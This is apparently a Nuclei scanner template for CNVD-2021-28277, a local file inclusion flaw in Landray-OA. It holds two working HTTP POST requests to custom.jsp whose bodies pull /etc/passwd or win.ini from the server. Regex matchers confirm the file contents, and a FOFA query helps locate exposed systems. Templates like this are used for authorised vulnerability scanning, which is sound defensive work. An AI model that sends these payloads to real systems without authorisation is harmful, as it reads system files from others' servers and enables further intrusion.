id: CNVD-2021-28277

info:
  name: Landray-OA - Local File Inclusion
  author: pikpikcu,daffainfo
  severity: high
  description: Landray-OA is susceptible to local file inclusion.
  reference:
    - https://www.aisoutu.com/a/1432457
    - https://mp.weixin.qq.com/s/TkUZXKgfEOVqoHKBr3kNdw
  classification:
    cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:N/A:N
    cvss-score: 8.6
    cwe-id: CWE-22
  metadata:
    max-request: 2
    fofa-query: app="Landray OA system"
  tags: LandRay-OA

http:
  - raw:
      - |
        POST /sys/ui/extend/varkind/custom.jsp HTTP/1.1
        Host: {{Hostname}}
        Accept: */*
        Content-Type: application/x-www-form-urlencoded

        var={"body":{"file":"file:///etc/passwd"}}
      - |
        POST /sys/ui/extend/varkind/custom.jsp HTTP/1.1
        Host: {{Hostname}}
        Accept: */*
        Content-Type: application/x-www-form-urlencoded

        var={"body":{"file":"file:///c://windows/win.ini"}}

    stop-at-first-match: true

    matchers-condition: and
    matchers:
      - type: regex
        regex:
          - "root:.*:0:0:"
          - "for 16-bit app support"
        condition: or

      - type: status
        status:
          - 200

# digest: 4a0a00473045022055ed57d6d24038e0c53a5a301192831ea1e2e562ada51eb178e08549e021db68022100d4c9e7513264a6ece808bd569d4d15d300d55b554bbf98f7016c1ab36c5e19e3:922c64590222798bb761d5b6d8e72950
